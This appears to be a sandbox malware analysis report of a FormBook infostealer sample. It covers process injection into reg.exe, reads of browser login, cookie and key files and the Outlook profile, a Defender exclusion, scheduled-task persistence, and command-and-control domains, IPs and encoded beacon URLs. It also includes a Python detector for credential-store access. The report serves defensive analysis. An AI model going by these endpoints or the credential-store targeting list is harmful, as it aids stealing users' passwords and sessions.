            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeQueries volume information: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

Source: Yara match | File source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\reg.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
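The telling detail in the entries above is not which files were opened but who opened them: reg.exe has no reason to read Chrome or Edge "Login Data", "Cookies", "Web Data", "Local State" or the Outlook MAPI profile key; here it is the process the injected FormBook payload hides behind. The following Python is an added example for this report (not Joe Sandbox code) that runs that owner check over the lines listed above. The set of processes treated as legitimate owners of those stores is an assumption of the example; the sample lines are the reg.exe entries from this section.

```python
"""Flag credential-store access by processes that should not be reading them.

Added example for this report, not Joe Sandbox code. SAMPLE_LINES are the
reg.exe entries listed above; LEGITIMATE_OWNERS is this example's assumption
about which processes normally open those files and keys.
"""
import re
from collections import defaultdict

# Substrings (lower-cased) that identify browser and mail credential stores.
CREDENTIAL_STORES = {
    "\\login data": "browser saved logins",
    "\\web data": "browser autofill / card data",
    "\\cookies": "browser cookies",
    "\\local state": "browser key material (DPAPI-wrapped AES key)",
    "\\windows messaging subsystem\\profiles\\outlook": "Outlook/MAPI profile",
}

# Processes that legitimately touch those stores (assumption of this example).
LEGITIMATE_OWNERS = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe"}

# Accepts both the fused report text ("reg.exeFile opened:") and the
# pipe-separated form ("reg.exe | File opened:").
LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.exe)\s*\|?\s*(?P<action>File opened|Key opened):\s*(?P<target>.+?)\s*$",
    re.IGNORECASE,
)


def parse_event(line):
    """Turn one behaviour line into a dict, or None if it is not a file/key open."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    proc_path = m.group("proc")
    return {
        "process": proc_path.rsplit("\\", 1)[-1].lower(),
        "action": m.group("action"),
        "target": m.group("target"),
    }


def classify(target):
    """Name the credential store a path or registry key belongs to, else None."""
    lowered = target.lower()
    for needle, label in CREDENTIAL_STORES.items():
        if needle in lowered:
            return label
    return None


def find_credential_access(lines):
    """Return (process, store label, target) for every access by a non-owner process."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue
        label = classify(event["target"])
        if label and event["process"] not in LEGITIMATE_OWNERS:
            hits.append((event["process"], label, event["target"]))
    return hits


def summarize(hits):
    """Map each offending process to the sorted list of store types it touched."""
    by_proc = defaultdict(set)
    for proc, label, _ in hits:
        by_proc[proc].add(label)
    return {proc: sorted(labels) for proc, labels in by_proc.items()}


# The reg.exe entries from this section of the report.
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\reg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\reg.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
""".strip().splitlines()

if __name__ == "__main__":
    for proc, labels in summarize(find_credential_access(SAMPLE_LINES)).items():
        print(f"{proc}: {', '.join(labels)}")
```

The same rule ports directly to an EDR file-open event source: key on the image name of the opener, not on the file name alone, since the browsers themselves open these files constantly.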

            Remote Access Functionality

Source: Yara match | File source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.jlsvOH1c8bSRKqM.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.4128079156.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.4131641803.00000000054B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1861489687.00000000011D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4129728569.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1860892913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.1966905087.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.4129663108.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.4129587923.0000000002BE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1962246339.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1863674159.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.4129589579.0000000004730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (listed by tactic; the digits in front of a technique are the signature badges the report shows for matched techniques, kept as displayed)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: 1 Command and Scripting Interpreter; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 312 Process Injection; 1 Scheduled Task/Job; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 1 Modify Registry; 41 Virtualization/Sandbox Evasion; 312 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: 2 File and Directory Discovery; 113 System Information Discovery; 221 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: 3 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph (ID 1468932, sample jlsvOH1c8bSRKqM.exe, start date 08/07/2024, architecture Windows, score 100), rendered as a process tree:

Start: contacts www.soutsour.xyz (Performs DNS queries to domains with low reputation), www.wb515.com and 19 other IPs or domains
Start: signatures Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 8 other signatures

jlsvOH1c8bSRKqM.exe (7)
  dropped: C:\Users\user\AppData\...\AZJifQrhDpEQCA.exe (PE32)
  dropped: C:\...\AZJifQrhDpEQCA.exe:Zone.Identifier (ASCII)
  dropped: C:\Users\user\AppData\Local\...\tmpB59F.tmp (XML)
  dropped: C:\Users\user\...\jlsvOH1c8bSRKqM.exe.log (ASCII)
  signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender
  +-- jlsvOH1c8bSRKqM.exe
  |     signature: Maps a DLL or memory area into another process
  |     +-- DAGiwzvTYsMjq.exe (injected)
  |           signature: Uses cmd line tools excessively to alter registry or file data
  |           +-- reg.exe
  |                 signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
  |                 +-- DAGiwzvTYsMjq.exe (injected)
  |                 |     network: www.soutsour.xyz 203.161.41.207 ports 49759, 49760, 49761 (VNPT-AS-VNVNPTCorpVN, Malaysia); boutiqueinaboxshop.com 3.33.130.190 ports 49741, 49747, 49748 (AMAZONEXPANSIONGB, United States); 6 other IPs or domains
  |                 |     signature: Found direct / indirect Syscall (likely to bypass EDR)
  |                 +-- firefox.exe
  +-- powershell.exe (23)
  |     signature: Loading BitLocker PowerShell Module
  |     +-- WmiPrvSE.exe
  |     +-- conhost.exe
  +-- powershell.exe (23)
  |     +-- conhost.exe
  +-- schtasks.exe (1)
        +-- conhost.exe

AZJifQrhDpEQCA.exe (5)
  signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  +-- AZJifQrhDpEQCA.exe
  |     +-- DAGiwzvTYsMjq.exe (injected)
  |           signatures: Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)
  |           +-- reg.exe
  +-- schtasks.exe (1)
  |     +-- conhost.exe
  +-- AZJifQrhDpEQCA.exe
  +-- AZJifQrhDpEQCA.exe

Initial sample
Source | Detection | Scanner | Label
jlsvOH1c8bSRKqM.exe | 34% | ReversingLabs |
jlsvOH1c8bSRKqM.exe | 32% | Virustotal |
jlsvOH1c8bSRKqM.exe | 100% | Joe Sandbox ML |

Dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | 34% | ReversingLabs |
C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | 32% | Virustotal |

Unpacked PE files
No Antivirus matches

Domains
Source | Detection | Scanner | Label
angrytee.com | 0% | Virustotal |
www.angrytee.com | 0% | Virustotal |
www.mysticriverpath.com | 0% | Virustotal |
www.boutiqueinaboxshop.com | 0% | Virustotal |

URLs
Source | Detection | Scanner | Label
http://www.fontbureau.com/designersG | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/? | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.fontbureau.com/designers? | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
http://www.fontbureau.com/designers | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.fonts.com | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0 | 0% | URL Reputation | safe
http://www.fontbureau.com | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/cabarga.htmlN | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.fontbureau.com/designers/frere-user.html | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.fontbureau.com/designers8 | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
http://www.jleabres.com/blhi/?gNl=C8WIH5va3s5TreqFc2nELhDO18EwidTtZxXY9LPFT+Lx3xlqM8I5Ju57JxDvAC7mNl8Ctob5Agt863C6qDgbGQkS7yjDKhT2SlbiFn0xwTwlv8oMq0J/ecs=&QdC=AFMh5N | 0% | Avira URL Cloud | safe
http://www.boutiqueinaboxshop.com/3c39/?QdC=AFMh5N&gNl=YJ1cks1SYK0GZq42JMKosMxqD7l69+m/NeZhR8z8BBiDd+X2Cv9su+DXwFPagftVLlPhJQa55ON8fFKrMbD5xy4GuGg/d1ltQY/UvK/AgFb7LLw4oj1fG5g= | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
http://www.jleabres.com/blhi/ | 0% | Avira URL Cloud | safe
http://www.mysticriverpath.com/0guv/ | 0% | Avira URL Cloud | safe
http://www.fundraiserstuffies.com/sm5u/?QdC=AFMh5N&gNl=zNZoGmKn88rfb3KOdi+n0xDDAiSnmhNP+SjTw3nNTKqa02KirOkI5zxlnzd0nBaR3gkleMTrs3XUtciJN1tFuT7tPHWqtnmTkchQjLPuknfMv3nJFi7Ou4E= | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Virustotal |
http://www.hf7777hi.net/w2w0/ | 0% | Avira URL Cloud | safe
https://www.google.com | 0% | Avira URL Cloud | safe
http://www.lmsforsme.com/ji0a/ | 0% | Avira URL Cloud | safe
http://www.mysticriverpath.com/0guv/?QdC=AFMh5N&gNl=koG+9f1JLs4iU3gpYtYeL1r94dP8/9FWskMDX1FP+QK1lg22bIT8kucy8PYjp4kPLlPGQE/9ELG4RRacCoDP+inEdxRGBXRQHVAT/D1/4SMcq2gI6by2YHg= | 0% | Avira URL Cloud | safe
http://www.boutiqueinaboxshop.com/3c39/ | 0% | Avira URL Cloud | safe
https://www.google.com | 0% | Virustotal |
http://blog.ytmc.fun | 0% | Avira URL Cloud | safe
http://www.qrdinamicos.com/3rdj/ | 0% | Avira URL Cloud | safe
http://www.lmsforsme.com/ji0a/ | 0% | Virustotal |
http://www.hf7777hi.net/w2w0/?gNl=0prXS1nuo7L4BRXFxH+6P5N8ZSQ81sbrd+caxMQkr8e3H5z/+yVS+HOiTMdRuolLjIsNRBtZ8MXFl+jKIOJJ6lQvMONrxVe4j9OmCVx+YV9WHy3pokjU6vI=&QdC=AFMh5N | 0% | Avira URL Cloud | safe
http://www.jleabres.com | 0% | Avira URL Cloud | safe
http://www.angrytee.com/8vcs/?QdC=AFMh5N&gNl=S5368XARNWnsRPU79+engpq5FH91z/VvzYo3ppZunCrDl85kGpMYYQZ3LKQ1c9Pzm3jcz7UCsoRBkqoouNpmJgjgkplBk0Qbj7O+44Ma0M/QxRY+rJ4fr5w= | 0% | Avira URL Cloud | safe
http://www.boutiqueinaboxshop.com/3c39/ | 0% | Virustotal |
https://duckduckgo.com/chrome_newtab | 0% | Virustotal |
http://www.lmsforsme.com/ji0a/?gNl=V3mCM9XQBGvfB9U06Ih+tXIqrPaKM7STaqz3Sg8J9fi/ICLIIWXTyIdm7sWw/CYltmRpxX2KmohWm3ESn2yFDi2EPP2Dl3Wtaq56t2waT9cNTaD0UhcN7pw=&QdC=AFMh5N | 0% | Avira URL Cloud | safe
http://www.soutsour.xyz/etzb/ | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://blog.ytmc.fun | 0% | Virustotal |
http://www.mscuration.com/g9bf/?gNl=lSzW3nVeW6JfMGMA7uN/7lGGplX0heZbz7O+lPV3tkxu97wid/nYpvoiQET18CfdiTSEkQjNZYpiQysHYXobuoEXQaB6E6dp7KAEYXO0AOAuSkjWL8ZFyYk=&QdC=AFMh5N | 0% | Avira URL Cloud | safe
http://www.mscuration.com/g9bf/ | 0% | Avira URL Cloud | safe
            https://www.fastmail.help/hc/en-us/articles/15000002801410%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            http://www.soutsour.xyz/etzb/?gNl=y1l9UKEI/lQ7TFqul8cFoyc9amTFojzHvoSS/tM0SGjjEe4pj9aFUBRbEUlPxRBYTwZ9epMSinUSWJlauv4T6Qd4dJfAkKACIvt4qodfW5IqShEDlLijX08=&QdC=AFMh5N0%Avira URL Cloudsafe
            http://www.wb515.com/fykj/0%Avira URL Cloudsafe
            http://www.wb515.com/fykj/?QdC=AFMh5N&gNl=35knRvMfoS1B/FjQR0nniARQj9EspOWzm24eQtGg/GuRPegg+KNm598AA4o0kC2C9Cini7tZg+0o0500Ok9c7JziiiuD4vC4eWhlbFnGTmqZG0oUv+qZGLo=0%Avira URL Cloudsafe
